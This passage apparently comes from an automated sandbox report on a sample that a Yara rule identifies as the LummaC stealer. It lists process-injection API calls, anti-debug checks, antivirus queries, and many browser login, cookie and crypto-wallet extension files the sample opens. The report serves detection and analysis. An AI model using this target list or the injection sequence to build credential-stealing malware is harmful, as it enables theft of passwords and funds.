Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: SoftWare.exe1.exe, 00000002.00000003.1686475427.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1686839866.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1076846866.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1010720289.00000000012DA000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000002.2135763168.00000000012DD000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1010456185.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.985710245.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1686657864.00000000012DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWAmLS
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

API call chain: ExitProcess graph end node

graph_2-41916

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 2_2_0044B1C0 LdrInitializeThunk,

2_2_0044B1C0

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 0_2_00806DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00806DE8

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 0_2_0082F1B4 mov edi, dword ptr fs:[00000030h]

0_2_0082F1B4

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 0_2_0081490C GetProcessHeap,

0_2_0081490C

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00806A2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00806A2C
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00806DDC SetUnhandledExceptionFilter,	0_2_00806DDC
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00806DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00806DE8
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_0080EF1E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0080EF1E
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00806A2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00806A2C
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00806DDC SetUnhandledExceptionFilter,	2_2_00806DDC
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00806DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00806DE8
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0080EF1E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0080EF1E

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 0_2_0082F1B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_0082F1B4

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Memory written: C:\Users\user\Desktop\SoftWare.exe1.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Process created: C:\Users\user\Desktop\SoftWare.exe1.exe "C:\Users\user\Desktop\SoftWare.exe1.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: EnumSystemLocalesW,	0_2_008188AB
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,	0_2_008188F6
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0081899D
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: EnumSystemLocalesW,	0_2_008141F7
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,	0_2_00818AA3
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00818238
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: EnumSystemLocalesW,	0_2_00818489
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,	0_2_00813CFC
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00818524
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,	0_2_008187D6
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: EnumSystemLocalesW,	0_2_00818777
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: EnumSystemLocalesW,	2_2_008188AB
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,	2_2_008188F6
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0081899D
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: EnumSystemLocalesW,	2_2_008141F7
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,	2_2_00818AA3
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00818238
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: EnumSystemLocalesW,	2_2_00818489
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,	2_2_00813CFC
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00818524
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: GetLocaleInfoW,	2_2_008187D6
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: EnumSystemLocalesW,	2_2_00818777

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 0_2_00807827 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00807827

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: SoftWare.exe1.exe, 00000002.00000003.1010720289.00000000012DA000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000002.2135362994.000000000129C000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1010456185.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1010421026.0000000001361000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: SoftWare.exe1.exe PID: 4600, type: MEMORYSTR
Source: Yara match	File source: 2.2.SoftWare.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SoftWare.exe1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2134397080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
